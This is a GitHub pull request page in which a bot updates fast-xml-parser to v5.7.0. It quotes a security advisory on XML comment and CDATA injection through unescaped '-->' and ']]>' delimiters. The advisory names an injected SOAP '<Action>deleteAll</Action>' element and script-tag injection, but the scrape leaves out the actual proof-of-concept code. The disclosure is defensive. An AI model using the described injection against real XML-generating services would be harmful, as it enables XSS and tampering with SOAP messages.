Update dependency fast-xml-parser to v5.7.0 [SECURITY]#16452
Merged
Conversation
|
renovate
Bot
changed the title
renovate
Bot
changed the title
renovate
Bot
force-pushed
the
renovate/npm-fast-xml-parser-vulnerability
branch
2 times, most recently
from
c048d10 to
ab1b5a3
Compare
renovate
Bot
changed the title
renovate
Bot
changed the title
renovate
Bot
changed the title
renovate
Bot
force-pushed
the
renovate/npm-fast-xml-parser-vulnerability
branch
2 times, most recently
from
ab1b5a3 to
7b005ac
Compare
renovate
Bot
changed the title
renovate
Bot
changed the title
renovate
Bot
force-pushed
the
renovate/npm-fast-xml-parser-vulnerability
branch
3 times, most recently
from
1daa68c to
096ceba
Compare
renovate
Bot
changed the title
Contributor
📊 Dependency Size ChangesWarning This PR adds 252.6 kB of new dependencies, which exceeds the threshold of 100 kB.
Total size change: 252.6 kB |
renovate
Bot
changed the title
renovate
Bot
changed the title
renovate
Bot
changed the title
renovate
Bot
force-pushed
the
renovate/npm-fast-xml-parser-vulnerability
branch
from
096ceba to
73f9080
Compare
ematipico
approved these changes
May 1, 2026
matthewp
added a commit
that referenced
this pull request
May 5, 2026
* Fix merge-fix workflow to handle conflict markers before install (#16539) * Handle merge conflicts in merge-fix workflow by stripping JSON/YAML markers and verifying via AI (#16541) * [ci] format * fix(render): avoid script dedup state consumption in inert template c… (#16527) * fix(render): avoid script dedup state consumption in inert template contexts #16525 * fix(render): normalize inert script dedup test outputs to strings * fix: add missing hydration metadata fields in inert-script-dedup tests * test(app): add component-level inert template script dedup coverage * test(app): stabilize inert script dedup regression coverage * fix(astro): move inert template dedup logic into hydration/directive script guards * [ci] format * fix: emit fallback rewrite pages (#16515) * fix(i18n): emit fallback rewrite pages * chore: add changeset * [ci] format * refactor(astro): replace tsconfck with get-tsconfig (#16433) * fix(language-server): remove circular dependency on svelte/vue integrations (#16532) * [ci] format * fix(upgrade): use bundled JS output (#16547) * Update dependency postcss to v8.5.10 [SECURITY] (#16489) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * Update dependency fastify to v5.8.5 [SECURITY] (#16346) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * Update dependency fast-xml-parser to v5.7.0 [SECURITY] (#16452) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * fix(cloudflare): preserve existing KV namespace bindings when injecting SESSION (#16555) * fix(slots): unwrap conditional slot callbacks (#16509) Co-authored-by: cyphercodes <cyphercodes@users.noreply.github.com> * fix: preserve CSS propagation for partial pages imported as components (#16415) * fix(astro): preserve CSS from imported partial pages Treat top-level pages as CSS boundaries only when they are referenced exclusively by the virtual page module, so partial pages imported as components continue propagating transitive styles in production builds. Made-with: Cursor * test(astro): fix partial CSS fixture component import path Correct the regression fixture path so the partial page can resolve ResultsTable during build on CI. Made-with: Cursor * test(astro): make partial css assertion robust to minification Assert that scoped ResultsTable selectors are present in extracted styles instead of matching a specific color token that can be minified differently across environments. Made-with: Cursor * chore: rerun CI after unrelated e2e flake Trigger a fresh workflow run for PR #16415 after unrelated flaky E2E failures in actions-blog/cloudflare/hmr tests. Made-with: Cursor * fix: propagate head metadata across ssr and prerender envs in dev (#16292) * fix: propagate head metadata across ssr and prerender envs in dev Signed-off-by: Patrick Linnane <patrick@linnane.io> * test(astro): cover head propagation through prerender env Signed-off-by: Patrick Linnane <patrick@linnane.io> --------- Signed-off-by: Patrick Linnane <patrick@linnane.io> * fix(assets): pass through images Sharp cannot decode instead of crashing (#16451) * fix(assets): pass through images Sharp cannot decode instead of crashing * test(assets): add test for animated AVIF pass-through * test(assets): add test for animated AVIF pass-through * fix(test): remove incorrect avif extension assertion * chore: add changeset for animated AVIF fix * feat(assets): add warning when Sharp cannot optimize unsupported image formats * chore: lint and whitespace * [ci] format * Update dependency @fastify/middie to v9.3.2 [SECURITY] (#16369) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> * perf(astro): skip session storage lookup if no cookie is set (#16540) * Fix defineLiveCollection interface loader typing (#16018) * Fix defineLiveCollection interface loader typing * Retrigger CI * Retrigger CI * [ci] format * Fix style compilation failure when importing components via tsconfig path aliases (#15994) * fix: resolve relative virtual module IDs in normalizeFilename for path alias styles When a component with a <style> tag is imported via a TypeScript path alias, certain environments (Windows + newer Node.js) can produce a relative virtual module ID (e.g. ./src/components/Foo.astro?astro&type=style). The load handler passed this through normalizeFilename to look up the compile metadata cache, but the function had no branch for ./-prefixed relative paths, so it returned the path unchanged instead of resolving it to an absolute path. This caused a cache miss and a build error. Adds a branch to resolve relative paths against root, matching the behavior used for /@fs and /path variants. Fixes #15963 * test: assert against emitted CSS file for path alias style regression test * fix(cloudflare): fix static assets and prerendered pages 404ing when `base` is configured. (#16277) * fix(cloudflare): static assets being in the wrong place * test(cloudflare): add tests * add changeset --------- Co-authored-by: Matthew Phillips <matthew@matthewphillips.info> * [ci] format * fix(test): update test-utils import from .js to .ts in .test.js files (#16560) * fix(frontmatter): preserve strings and comments when replacing top-le… (#16552) * fix(frontmatter): preserve strings and comments when replacing top-level return (#16551) * chore: add changeset for cloudflare KV namespace fix * fix(cloudflare): re-apply KV namespace merge fix after source revert --------- Co-authored-by: Matthew Phillips <matthewphillips@cloudflare.com> * fix: processing procedure for dynamic paths (#16144) * feat: test maching dynamic routes contain .html in their params * fix: processing procedure for dynamic paths * feat: changeset file for processing procedure for dynamic pahts * refactor(routing): move .html stripping logic from getParams to getProps * fix: UT of getParams function by fixing path mismatch error returning html file * fix: logic of removing .html extention * Apply suggestion from @Fryuni Co-authored-by: Luiz Ferraz <luiz@lferraz.com> * Apply suggestion from @Fryuni Co-authored-by: Luiz Ferraz <luiz@lferraz.com> * Apply suggestion from @Fryuni Co-authored-by: Luiz Ferraz <luiz@lferraz.com> --------- Co-authored-by: Matthew Phillips <matthew@matthewphillips.info> Co-authored-by: Luiz Ferraz <luiz@lferraz.com> Co-authored-by: Matthew Phillips <matthewphillips@cloudflare.com> * fix(css): preserve scope on nested & with lightningcss transformer (#16548) * fix(css): preserve scope on nested & with lightningcss transformer with `vite.css.transformer: 'lightningcss'`, scoped styles using `:where(& > ...)` (the shape tailwind v4's `space-x-*`, `space-y-*`, and `divide-*` expand to) put the scope attribute on the matched child instead of the parent. lightningcss flattened the nesting before `@astrojs/compiler` ran scope injection, so by then `:where(...)` was the leading compound and the injector prepended `[data-astro-cid-X]` as a new leading compound — constraining the wrong element. ask lightningcss to skip nesting lowering during the per-component `preprocessCSS` call (via `Features.Nesting` on a shallow-cloned config — non-mutating, safe under parallel compiles). vite's final pipeline still lowers nesting for the bundle. adds a regression test covering the reporter's exact shape. Fixes #16524 * docs(changeset): rewrite per astro guidelines --------- Co-authored-by: Matthew Phillips <matthewphillips@cloudflare.com> * Fixes @_@ not being stripped from CSS file names (#16264) Co-authored-by: Matthew Phillips <matthew@matthewphillips.info> Co-authored-by: Matthew Phillips <matthewphillips@cloudflare.com> * fix : astro image position prop bug (#16236) * feat: test of astro image position prop bug * fix: logic of getItem function * feat: changeset file * fix: create data-astro-image-pos attribute all time for path csp unit test * feat: another test of getImage function * fix: change set explanetion more clealy for users * Add: yaml file * chore: clean up changeset --------- Co-authored-by: Matthew Phillips <matthew@matthewphillips.info> Co-authored-by: Matthew Phillips <matthewphillips@cloudflare.com> * [ci] format * fix(build): exclude prerendered route styles from SSR manifest (#16517) Inline CSS for prerendered routes is dead weight in the SSR manifest: the prerendered HTML on disk already contains the <style> tags, and the SSR worker never renders these routes. Strip styles for prerendered routes from the SSR manifest while leaving the prerender manifest (and prerendered HTML) unchanged. Cuts SSR entry-chunk size on hybrid builds with build.inlineStylesheets: "always", reducing cold-start parse cost on Cloudflare Workers and similar platforms. * fix(prefetch): trigger tap strategy when clicking nested child elements (#16566) * fix(prefetch): trigger tap strategy when clicking nested child elements * fix(prefetch): trigger tap and hover strategies when clicking nested child elements * fix(astro): persist session delete without prior get/set (#16565) * fix(astro): persist session delete without prior get/set * est(e2e): sync collectLoads to avoid race with assertions * fix(astro): persist session delete without prior get/set * fix: route mismatch using trail slash never (#16516) * feat: test for route match fails when trailingSlash never * fix: root route matching with trailingSlash: 'never' and base path * feat: changeset file * fix: root route matching with trailingSlash 'never' and base path in dev server and rewrites The `normalizeRewritePathname` in rewrite.ts was returning '' (empty string) for root-path rewrites with a non-root base, and app.ts was converting the stripped pathname '/' to '' before route matching. Both relied on the old '^$' pattern for the index route. After the pattern.ts fix made the root pattern '^/$', these normalizations broke matching. Remove the '/' -> '' conversions so route.pattern.test('/') correctly matches the fixed '^/$' pattern in both direct requests and Astro.rewrite() calls * fix: add regression test for root path normalization with base --------- * [ci] format * [ci] release (#16545) Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com> * fix: resolve merge conflicts from main into next * fix: resolve merge issues from main into next - Add missing dependencies (get-tsconfig, jsonc-parser) and remove tsconfck (replaced on main by PR #16433 but deps were lost during merge) - Remove unused replaceTopLevelReturns export from vite-plugin-astro/utils.ts (function from main's PR #16552 not used by next's Rust compiler, fixes knip lint) - Update lightningcss-scoped-nesting test expectations for Rust compiler (next branch handles CSS scoping differently, test from PR #16548) - Format compile.ts (remove extra blank line) * chore: trigger CI * fix: add head-inject directive to propagated assets module for CSS injection * chore: update main-to-next merge * chore: retrigger CI * chore: retrigger CI --------- Signed-off-by: Patrick Linnane <patrick@linnane.io> Co-authored-by: Matthew Phillips <matthewphillips@cloudflare.com> Co-authored-by: Matthew Phillips <matthewp@users.noreply.github.com> Co-authored-by: Chan <101856681+enjoyandlove@users.noreply.github.com> Co-authored-by: knj <kenji.tomita1996@gmail.com> Co-authored-by: knj <ematipico@users.noreply.github.com> Co-authored-by: ocavue <ocavue@users.noreply.github.com> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: web-dev0521 <jasonpette1783@gmail.com> Co-authored-by: Rayan Salhab <r.salhab@aiyexpertsolutions.com> Co-authored-by: cyphercodes <cyphercodes@users.noreply.github.com> Co-authored-by: 0x K. <66915025+0xbejaxer@users.noreply.github.com> Co-authored-by: Patrick Linnane <patrick@linnane.io> Co-authored-by: Maxim Slobodchikov <93232189+maximslo@users.noreply.github.com> Co-authored-by: Matt Kane <m@mk.gg> Co-authored-by: Felmon <felmonon@gmail.com> Co-authored-by: Ossaid <imossaidquadri@gmail.com> Co-authored-by: Calvin Liang <me@calvin.sh> Co-authored-by: Matthew Phillips <matthew@matthewphillips.info> Co-authored-by: fkatsuhiro <113022468+fkatsuhiro@users.noreply.github.com> Co-authored-by: Luiz Ferraz <luiz@lferraz.com> Co-authored-by: Utpal Sen <utpalsen902@gmail.com> Co-authored-by: atsbob <98831687+atsbob@users.noreply.github.com> Co-authored-by: Adam Chalemian <adam@chal.net> Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
1 participant
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
This PR contains the following updates:
5.5.7→5.7.0fast-xml-parser XMLBuilder: XML Comment and CDATA Injection via Unescaped Delimiters
CVE-2026-41650 / GHSA-gh4j-gqv2-49f6
More information
Details
fast-xml-parser XMLBuilder: Comment and CDATA Injection via Unescaped Delimiters
Summary
fast-xml-parser XMLBuilder does not escape the
-->sequence in comment content or the]]>sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation.Existing CVEs for fast-xml-parser cover different issues:
This finding covers unescaped comment/CDATA delimiters in XMLBuilder - a distinct vulnerability.
Vulnerable Code
File:
src/fxb.jsCompare with attribute/text escaping which IS properly handled via
replaceEntitiesValue().Proof of Concept
Test 1: Comment Injection (XSS in SVG/HTML context)
Output:
Test 2: CDATA Injection (RSS feed)
Output:
Test 3: SOAP Message Injection
Output:
The injected
<Action>deleteAll</Action>appears as a real SOAP action element.Tested Output
All tests run on Node.js v22, fast-xml-parser v5.5.12:
Impact
An attacker who controls data that flows into XML comments or CDATA sections via XMLBuilder can:
<script>tags into XML/SVG/HTML documents served to browsersThis is practically exploitable whenever applications use XMLBuilder to generate XML from data that includes user-controlled content in comments or CDATA (e.g., RSS feeds, SOAP services, SVG generation, config files).
Suggested Fix
Escape delimiters in comment and CDATA content:
Severity
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NReferences
This data is provided by the GitHub Advisory Database (CC-BY 4.0).
Release Notes
NaturalIntelligence/fast-xml-parser (fast-xml-parser)
v5.7.0Compare Source
v5.6.0Compare Source
v5.5.12Compare Source
v5.5.11Compare Source
v5.5.10: performance improvment, increase entity expansion default limitCompare Source
jPath: falseFull Changelog: NaturalIntelligence/fast-xml-parser@v5.5.9...v5.5.10
v5.5.9: fix typins and matcher instance in callbacksCompare Source
combine typings file to avoid configuration changes
pass readonly instance of matcher to the call backs to avoid accidental push/pop call
v5.5.8Compare Source
Configuration
📅 Schedule: (UTC)
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.